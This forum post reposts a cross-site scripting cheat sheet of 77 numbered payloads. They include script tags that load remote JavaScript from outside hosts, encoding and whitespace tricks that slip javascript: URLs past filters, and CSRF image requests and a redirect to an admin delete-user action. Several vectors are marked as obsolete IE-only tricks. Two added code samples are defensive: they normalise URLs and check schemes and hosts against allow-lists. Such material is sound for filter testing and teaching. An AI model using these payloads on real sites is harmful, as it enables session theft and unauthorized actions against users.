There doesn't seem to be much XSS material on t00ls; I saw some good stuff and copied it over, in case anyone wants to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript URL
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML character references (the semicolons are required for this form); the browser decodes the SRC back to javascript:alert('XSS')
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag: the parser recovers from the broken attribute and the SCRIPT that follows still runs
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode, for when quotes are filtered
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8/Unicode character-reference encoding (payload omitted in the source)
<IMG SRC=jav..omitted..S')>

(9) 7-bit Unicode character references without semicolons (payload omitted in the source)
<IMG SRC=jav..omitted..S')>

(10) Hex character references, also without semicolons (payload omitted in the source)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word javascript (the gap in jav ascript is a literal tab character, which browsers strip out of URLs)
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript: the same vector with a carriage return after every character, an extreme example of how far the URL can be broken up and still run
<IMG SRC="javascript:alert('XSS')">

(16) Working around a length limit (all fragments must land on the same page): each script appends to a string and the last one evals it, which writes <script src=http://www.shell.net/1.js></script> into the page
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte inside the scheme (generate the file with perl, since the byte cannot be typed)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte inside the tag name. Null bytes only worked against older Internet Explorer versions that dropped them; current browsers replace a null inside a tag or attribute with U+FFFD, so in practice there is nothing left to exploit with them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and control characters in front of the JavaScript in an IMG
<IMG SRC=" &#14;  javascript:alert('XSS');">
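Items (3) to (5), (9) to (14) and (17) to (19) all smuggle the same javascript: scheme past a filter that looks at the raw attribute text. The example below is mine, not part of the cheat sheet: it decodes an attribute value the way the HTML tokenizer and the WHATWG URL parser do (character references with and without semicolons, U+0000 handling, trimming of leading/trailing controls, deletion of tab/LF/CR) and only then reads the scheme, and it checks the result against an allow-list instead of a blocklist. The function names and the sample vectors are my own constructions.

```javascript
// Added example (mine, not part of the cheat sheet): normalise a URL attribute
// value the way a browser does before asking which scheme it carries. Decoding
// follows the HTML tokenizer (character references, NUL handling) and the
// WHATWG URL parser (trim leading/trailing controls and spaces, delete
// tab/LF/CR anywhere). Function names are assumptions of this example.

// Named references that matter for scheme smuggling (HTML names are case-sensitive).
const NAMED_REFS = { Tab: "\t", NewLine: "\n", colon: ":" };

// One pass over the string, so "&#38;#106;" decodes to "&#106;" and no further,
// as in a real tokenizer. Numeric references are accepted with or without the
// trailing semicolon, in decimal (&#106; or &#0000106) and hex (&#x6A;) form.
function decodeCharRefs(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([A-Za-z]+);/gi, (m, hex, dec, name) => {
    if (name !== undefined) return NAMED_REFS[name] ?? m;
    const cp = parseInt(hex ?? dec, hex !== undefined ? 16 : 10);
    return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

function resolveScheme(attrValue, { legacyNulStrip = false } = {}) {
  let v = decodeCharRefs(attrValue);
  // HTML tokenizer: U+0000 in an attribute value becomes U+FFFD. Older Internet
  // Explorer dropped it instead, which is what the null-byte vectors relied on.
  v = v.replace(/\0/g, legacyNulStrip ? "" : "\uFFFD");
  // URL parser: trim C0 controls and spaces at both ends, then delete tab, LF and CR anywhere.
  v = v.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "").replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  return m ? m[1].toLowerCase() : null;   // null: no scheme, i.e. a relative URL
}

const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);

// Allow-list check for src/href values: relative URLs pass, anything else must
// carry an allow-listed scheme after normalisation.
function isSafeUrlAttribute(attrValue) {
  const scheme = resolveScheme(attrValue);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// The kind of check the vectors above are written to beat: a substring match on the raw value.
function naiveBlocklist(attrValue) {
  return /javascript:/i.test(attrValue);
}

// Constructed sample inputs, one per evasion from the list above.
const VECTORS = [
  "javascript:alert('XSS')",                                    // (3) plain
  "JaVaScRiPt:alert('XSS')",                                    // (4) mixed case
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",   // (5) decimal refs
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",  // (10) hex, no semicolons
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",  // (9) long decimal, no semicolons
  "jav\tascript:alert('XSS');",                                 // (11) literal tab
  "jav&#x09;ascript:alert('XSS');",                             // (12) encoded tab
  "jav&#x0A;ascript:alert('XSS');",                             // (13) newline
  "jav&#x0D;ascript:alert('XSS');",                             // (14) carriage return
  " &#14;  javascript:alert('XSS');",                           // (19) leading space and control char
];

// For each vector: would the substring blocklist catch it, and what scheme does
// the browser actually end up with?
function audit(vectors = VECTORS) {
  return vectors.map((v) => ({ vector: v, naiveBlocks: naiveBlocklist(v), scheme: resolveScheme(v) }));
}

for (const row of audit()) {
  console.log(`${row.naiveBlocks ? "caught " : "MISSED "} scheme=${row.scheme}  ${JSON.stringify(row.vector)}`);
}
```

Every vector resolves to the javascript scheme, while the substring check misses seven of the ten. The null-byte vectors from (17) and (18) only resolve to javascript with legacyNulStrip set, which is the old IE behaviour; under the current tokenizer the NUL turns into U+FFFD and the value has no scheme at all.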
(20) Non-alpha-non-digit XSS: a slash ends the tag name, so what follows is parsed as attributes
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2 (under the HTML5 tokenizer the extra characters become part of the attribute name, so no onload handler is registered; this vector only worked on older parsers)
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2, with a protocol-relative URL
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons: the payload text is read out of a regex literal
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes: when the input lands inside a JS string and the filter backslash-escapes the quote, the injected backslash cancels the filter's one
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY onload
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC (IE only)
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND (IE only)
<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet (the XSS lives in the CSS file, for example an expression() or a javascript: url)
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript (IE only)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the URL (any of 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279 works)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression (IE only)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute expression on an IMG
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that starts with an open angle bracket and a letter is parsed as a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with the expression keyword broken up by a CSS comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Inside the Flash file, ActionScript can assemble the XSS from pieces; the concatenation below evaluates to getURL("javascript:alert('XSS');")
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace with an HTC behaviour (IE only; the .htc file must be on the same server as the XSS vector)
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, serve it from a file with an image extension: a SCRIPT tag runs whatever it fetches, whatever the file is called. Current browsers do refuse to run a script whose response carries an image/* Content-Type, so the server still has to send it as text or JavaScript
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command: this is CSRF rather than script execution. If the page you inject into sits behind a login, the victim's browser fetches the IMG URL with their cookies, so a GET to an admin action runs with the victim's privileges
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command via redirect (a.jpg on the same server): the image URL looks harmless and the Apache rule below redirects it to the admin action
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing filters with HTML quote encapsulation: a filter that cuts the tag at the first > sees <SCRIPT a="> and misses the SRC, while the browser keeps the quoted > inside the attribute value
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) The first script writes <SCRI into the parser's input stream, where it joins the PT SRC=... that follows, so the raw markup never contains the string <SCRIPT SRC
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (percent-encoded host name; the browser decodes it before resolving)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) IP as a single decimal number (192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: decimal, octal and hex octets in one address (66.102.7.147), plus a newline and tabs inside the URL that the browser strips out
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
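Items (68) to (77) are about how many spellings one host has; a filter that compares the raw string to a blocklist loses to all of them. The example below is mine, not part of the cheat sheet: it canonicalises the host of a link the way the WHATWG URL parser does (whitespace stripping, percent-decoding, decimal/hex/octal IPv4 forms, trailing dot, userinfo before @) and then applies a host allow-list plus a scheme check. It goes one step beyond the list by also handling the user@host form. Function names, the allow-list and the sample links are my own constructions.

```javascript
// Added example (mine, not from the cheat sheet): canonicalise the host of a
// link the way the WHATWG URL parser does, so a host allow-list cannot be dodged
// with vectors 68-76 (it also resolves the userinfo trick, user@host, which the
// list does not show). Numeric hosts follow the IPv4 parser: 1 to 4 dot-separated
// parts, each decimal, 0x-hex or leading-zero octal, the last part filling the
// remaining bytes. Function names and the allow-list are assumptions of this example.

// One IPv4 "number" as the URL parser reads it; NaN if the part is not numeric.
function parseIPv4Number(part) {
  if (part === "") return NaN;
  let radix = 10, digits = part;
  if (/^0[xX]/.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === "0") { radix = 8; digits = part.slice(1); }
  if (digits === "") return 0;                       // "0x" and "0" on their own are zero
  const ok = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  return ok.test(digits) ? parseInt(digits, radix) : NaN;
}

// Dotted-decimal form of a numeric host, or null if it is a domain name.
function ipv4ToDotted(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop();   // "1.2.3.4." is allowed
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Number);
  if (nums.some(Number.isNaN)) return null;
  const head = nums.slice(0, -1), last = nums[nums.length - 1];
  if (head.some((n) => n > 255) || last >= 256 ** (5 - nums.length)) return null;   // out of range
  let value = last;
  head.forEach((n, idx) => { value += n * 256 ** (3 - idx); });
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// Scheme and canonical host of a link as the browser will see them.
function classifyLink(rawUrl) {
  // URL parser preprocessing: trim C0 controls and spaces, delete tab/LF/CR anywhere (vector 73).
  const u = rawUrl.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "").replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(u);
  const scheme = m ? m[1].toLowerCase() : null;              // null: scheme-relative or path-relative
  const rest = m ? u.slice(m[0].length) : u;
  if (!rest.startsWith("//")) return { scheme, host: null };  // no authority, hence no host
  let authority = rest.slice(2).split(/[\/?#\\]/, 1)[0];
  authority = authority.slice(authority.lastIndexOf("@") + 1);   // drop userinfo (user:pass@)
  let host = authority.replace(/:[0-9]*$/, "").toLowerCase();    // drop the port
  try { host = decodeURIComponent(host); } catch { /* malformed escape: keep as-is */ }   // vector 69
  const ip = ipv4ToDotted(host);                                  // vectors 70-73
  if (ip !== null) return { scheme, host: ip };
  return { scheme, host: host.endsWith(".") ? host.slice(0, -1) : host };   // vector 76: trailing dot
}

const canonicalHost = (rawUrl) => classifyLink(rawUrl).host;

const ALLOWED_HOSTS = new Set(["www.google.com", "google.com"]);   // constructed allow-list

// Accept path-relative links and http(s) links to allow-listed hosts only.
function linkAllowed(rawUrl) {
  const { scheme, host } = classifyLink(rawUrl);
  if (scheme !== null && scheme !== "http" && scheme !== "https") return false;   // vector 77 and friends
  if (host === null) return scheme === null;       // path-relative link, stays on this origin
  return ALLOWED_HOSTS.has(host);
}

// Constructed sample links, numbered as in the list above.
const LINK_VECTORS = [
  "http://127.0.0.1/",                               // (68)
  "http://%33%77%2E%6F%72%67",                       // (69) percent-encoded 3w.org
  "http://3232235521",                               // (70)
  "http://0xc0.0xa8.0x00.0x01",                      // (71)
  "http://0300.0250.0000.0001",                      // (72)
  "h\ntt\tp://6\t6.000146.0x7.147/",                 // (73)
  "//www.google.com/",                               // (74)
  "http://google.com/",                              // (75)
  "http://www.google.com./",                         // (76)
  "javascript:document.location='http://www.google.com/'",   // (77)
  "http://www.google.com@127.0.0.1/",                // userinfo trick, not in the list above
];

for (const v of LINK_VECTORS) {
  console.log(JSON.stringify(v), "->", classifyLink(v), linkAllowed(v) ? "allowed" : "blocked");
}
```

Node's built-in WHATWG URL class applies the same whitespace and IPv4 rules (new URL("http://3232235521/").hostname is "192.168.0.1"), so in production code prefer it over a hand-written parser and only then compare the host; the version above exists to make the individual rules visible. Note that the check is an allow-list keyed on the canonical host: a blocklist of spellings, which is what these vectors target, would have to enumerate every form.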